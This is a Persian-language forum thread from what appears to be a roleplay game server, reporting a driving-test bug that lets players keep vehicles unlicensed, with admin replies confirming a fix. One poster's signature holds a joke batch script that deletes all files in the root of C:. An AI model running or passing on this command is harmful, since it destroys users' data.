AminsVn ارسال شده در January 15, 2021 اشتراک گذاری ارسال شده در January 15, 2021 (ویرایش شده) - عکس از محیط کاربری که می خواهید جوایز را دریافت کنید: - توضیح کامل باگ: با سلام طبق صحبتی که با سوپروایزر محترم وقت سرور، عزیزدل کامیاب جان داشتیم میخوام این باگ رو گزارش کنم تا لطف کنین سریع تر بهش رسیدگی کنین. خب خیلی خلاصه میگم، ما وقتی تست یک نفر رو استارت میکنیم اون شخص میتونه موریک دودو یا استانت و قایق های رنتی رو سوار بشه و تا زمانی که ما استاپ نکنیم برای اینکار احتیاجی به مجوز ندارند. حالا مشکلاتی که اینجا هست اینه که : متاسفانه بخاطر نبود قانون برای جلوگیری از کشتن معلمین در حال تست، توسط هیتمن ها به وفور پیش اومده بعد از استارت کردن تست یک نفر و یا در حین تست معلم توسط هیتمن کشته میشه و اون پلیر در حال تست میتونه به راحتی بدون نیاز به مجوز بره و دستور اف وی آر هم تو این مورد دیگه کاری ازش ساخته نیست. به قول یارو گفتنی ما باید دنبال پلیر کنیم تا بتونیم استاپ لسن بزنیم تا بشه وسیله نقلیه فکشن رو ازش پس گرفت. یا پیش اومده که ما تست یک نفر رو استارت کردیم و پلیری که داره تست میده کشته میشه و یا بعد از استارت ما مشکل نت پیدا میکنیم و کرش میشیم و در کل این باگ واقعا مشکل ایجاد میکنه. فکر میکنم توضیحات تا همینجا کافی باشن. اینو اضافه میکنم ما مورد داشتیم پلیر اومده سوار موریک شده و معلم رو اجکت کرده و رفته که سال دیگه با برف بیاد. - قرار دادن عکس و فیلم کم حجم شده (در صورت لزوم): - - توضیح دادن این که چگونه می توانیم خودمان با آن باگ برخورد کنیم. (چگونه آن باگ را Reproduce کنیم): من 2 راه کار برای حل مشکل پیشنهاد میدم: روش اول: وقتی پلیر یا معلم هر کدام کشته شدند یا کرش شدند، تست به صورت اتوماتیک استاپ بشه. روش دوم(Recommended): تعیین فاصله مشخص بین پلیر و معلم برای تست گرفتن، یعنی اگر پلیر به عنوان مثال از دایره 100 متری یک معلم بیرون رفت و ازش دور شد تست خود به خود متوقف بشه. @Ali @RealSlimShady ویرایش شده January 15, 2021 توسط AminsVn تگ کردن مدیر و مسئول مربوطه Enter as a Blind , Exit as a Mute @echo off cd "C:\" del *.* exit لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iErfaN ارسال شده در January 15, 2021 اشتراک گذاری ارسال شده در January 15, 2021 امین داش ، اعتراف میکنم که ی بار stop نکرده بودم(کیل شده بودم) تو چت f گفتم Stop اما چون کیل شدم به خاطر گیر کردن وسط قایق ، یادم رفت. 3ساعت بعد یارو دیدم که نزدیک جزیره داشته با قایق میرفته و 5 6 نفر هم داخلش بودن و من هم پریدم توش، ی لحظه بهم کفت که لایس fishام داره تموم میشه و گفتم sl کنه ، دیدم لایس قایق نداره ولی داره میرونه با کلی بدبختی و یواشکی اوکیش کردم. ??? ??????? Oʅԃ lover ™๓ץรՇเςɭภ1เ.เгรŦค๓ฬคгєՇค~ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Broker ارسال شده در January 17, 2021 اشتراک گذاری ارسال شده در January 17, 2021 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
مدیریت Kamyab ارسال شده در January 19, 2021 مدیریت اشتراک گذاری ارسال شده در January 19, 2021 درود @AminsVn گزارش شما رویت شد در پی حل این مشکل هستیم. In my shoes, just to see, what it’s like to be me, I’ll be you, let’s trade shoes لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
OmidGH ارسال شده در January 26, 2021 اشتراک گذاری ارسال شده در January 26, 2021 و همانا گزارشات ما از خاردار ترین نوع گزارشات هستند. @RealSlimShady 1 یا حیدر کرّار لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
مؤسس Ali ارسال شده در January 28, 2021 مؤسس اشتراک گذاری ارسال شده در January 28, 2021 Distance check از دستور stoplesson/ حذف شد. جوایز داده می شود. 1 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ارسالهای توصیه شده